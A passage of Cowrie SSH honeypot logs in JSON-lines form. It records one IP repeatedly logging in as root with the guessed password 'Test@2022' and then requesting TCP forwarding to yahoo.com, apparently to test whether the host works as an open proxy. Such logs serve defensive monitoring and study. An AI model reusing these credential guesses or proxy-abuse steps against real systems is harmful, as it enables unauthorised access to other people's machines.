sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.543468Z","src_ip":"213.209.150.239","session":"c782091bb0fa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.778210Z","src_ip":"213.209.150.239","session":"c782091bb0fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":15698,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15698","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.826585Z","session":"c782091bb0fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:56.873877Z","src_ip":"213.209.150.239","session":"c782091bb0fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19932,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19932","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.009678Z","session":"c782091bb0fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.056707Z","src_ip":"213.209.150.239","session":"c782091bb0fa"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.105277Z","src_ip":"213.209.150.239","session":"c782091bb0fa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34135,"dst_ip":"1.2.3.4","dst_port":22,"session":"e31669c5fc99","protocol":"ssh","message":"New connection: 213.209.150.239:34135 (1.2.3.4:22) [session: e31669c5fc99]","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.161080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.170999Z","src_ip":"213.209.150.239","session":"e31669c5fc99"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.217988Z","src_ip":"213.209.150.239","session":"e31669c5fc99"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.541145Z","src_ip":"213.209.150.239","session":"e31669c5fc99"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25926,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25926","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.598630Z","session":"e31669c5fc99"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.655373Z","src_ip":"213.209.150.239","session":"e31669c5fc99"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13225,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13225","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.811793Z","session":"e31669c5fc99"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.868417Z","src_ip":"213.209.150.239","session":"e31669c5fc99"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.926634Z","src_ip":"213.209.150.239","session":"e31669c5fc99"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34212,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f679e66f633","protocol":"ssh","message":"New connection: 213.209.150.239:34212 (1.2.3.4:22) [session: 4f679e66f633]","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.973182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:57.974206Z","src_ip":"213.209.150.239","session":"4f679e66f633"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.021780Z","src_ip":"213.209.150.239","session":"4f679e66f633"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.259352Z","src_ip":"213.209.150.239","session":"4f679e66f633"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":22172,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:22172","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.308553Z","session":"4f679e66f633"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.355974Z","src_ip":"213.209.150.239","session":"4f679e66f633"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19123,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19123","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.493835Z","session":"4f679e66f633"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.541378Z","src_ip":"213.209.150.239","session":"4f679e66f633"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.589529Z","src_ip":"213.209.150.239","session":"4f679e66f633"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34260,"dst_ip":"1.2.3.4","dst_port":22,"session":"50dc11ce5bea","protocol":"ssh","message":"New connection: 213.209.150.239:34260 (1.2.3.4:22) [session: 50dc11ce5bea]","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.645223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.645882Z","src_ip":"213.209.150.239","session":"50dc11ce5bea"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.702782Z","src_ip":"213.209.150.239","session":"50dc11ce5bea"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:58.985769Z","src_ip":"213.209.150.239","session":"50dc11ce5bea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":5676,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5676","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.043443Z","session":"50dc11ce5bea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.100438Z","src_ip":"213.209.150.239","session":"50dc11ce5bea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":23990,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:23990","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.254972Z","session":"50dc11ce5bea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.311848Z","src_ip":"213.209.150.239","session":"50dc11ce5bea"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.369533Z","src_ip":"213.209.150.239","session":"50dc11ce5bea"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34322,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fc78bced673","protocol":"ssh","message":"New connection: 213.209.150.239:34322 (1.2.3.4:22) [session: 9fc78bced673]","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.415749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.417529Z","src_ip":"213.209.150.239","session":"9fc78bced673"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.464651Z","src_ip":"213.209.150.239","session":"9fc78bced673"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.699603Z","src_ip":"213.209.150.239","session":"9fc78bced673"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":23732,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23732","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.747572Z","session":"9fc78bced673"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.794805Z","src_ip":"213.209.150.239","session":"9fc78bced673"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":17523,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17523","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.929526Z","session":"9fc78bced673"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:59.976674Z","src_ip":"213.209.150.239","session":"9fc78bced673"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.025603Z","src_ip":"213.209.150.239","session":"9fc78bced673"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34363,"dst_ip":"1.2.3.4","dst_port":22,"session":"73914392b034","protocol":"ssh","message":"New connection: 213.209.150.239:34363 (1.2.3.4:22) [session: 73914392b034]","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.071836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.072526Z","src_ip":"213.209.150.239","session":"73914392b034"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.119869Z","src_ip":"213.209.150.239","session":"73914392b034"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.355105Z","src_ip":"213.209.150.239","session":"73914392b034"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25127,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25127","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.403117Z","session":"73914392b034"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.450273Z","src_ip":"213.209.150.239","session":"73914392b034"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10664,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10664","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.585470Z","session":"73914392b034"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.632800Z","src_ip":"213.209.150.239","session":"73914392b034"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.680745Z","src_ip":"213.209.150.239","session":"73914392b034"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34421,"dst_ip":"1.2.3.4","dst_port":22,"session":"37b384d045d1","protocol":"ssh","message":"New connection: 213.209.150.239:34421 (1.2.3.4:22) [session: 37b384d045d1]","sensor":"my-vps","timestamp":"2025-08-26T01:05:00.736670Z"}
